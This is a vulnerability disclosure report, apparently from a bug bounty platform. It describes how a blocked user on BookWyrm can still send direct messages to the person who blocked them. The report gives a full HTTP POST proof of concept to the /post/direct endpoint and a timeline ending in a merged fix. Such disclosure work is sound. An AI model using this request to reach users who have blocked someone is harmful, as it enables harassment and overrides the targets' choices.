Send message to blocked user in bookwyrm-social/bookwyrm

Valid

Reported on

Aug 5th 2022


Description

In this case if a userA block userB. UserB is still able to send private message to user A

Proof of Concept

1.USerA block userB 
2.UserB send direct request to message endpoint with userA''s userID


# Poc
POST https://bookwyrm.social/post/direct
Host: bookwyrm.social
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://bookwyrm.social/direct-messages/alizo2
Content-Type: multipart/form-data; boundary=---------------------------63531825311408735291403048175
Origin: https://bookwyrm.social
Content-Length: 940
DNT: 1
Connection: keep-alive
Cookie: csrftoken=; django_language=None; sessionid=suokqtn2cfu01jpoys18vni112ndmzjr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
Pragma: no-cache
Cache-Control: no-cache

-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="csrfmiddlewaretoken"

token
-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="book"


-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="user"

id
-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="reply_parent"


-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="content"

@Victim's Username   message
-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="content_warning"


-----------------------------63531825311408735291403048175
Content-Disposition: form-data; name="privacy"

direct
-----------------------------63531825311408735291403048175--



# Impact

Sending message to a user even if he blocked  a specific user
We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 2 months ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back 2 months ago
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. a month ago
We have sent a second follow up to the bookwyrm-social/bookwyrm team. We will try again in 10 days. a month ago
We have sent a third and final follow up to the bookwyrm-social/bookwyrm team. This report is now considered stale. a month ago
Mouse Reeve validated this vulnerability 25 days ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on 1f93dc 25 days ago
The fix bounty has been dropped
to join this conversation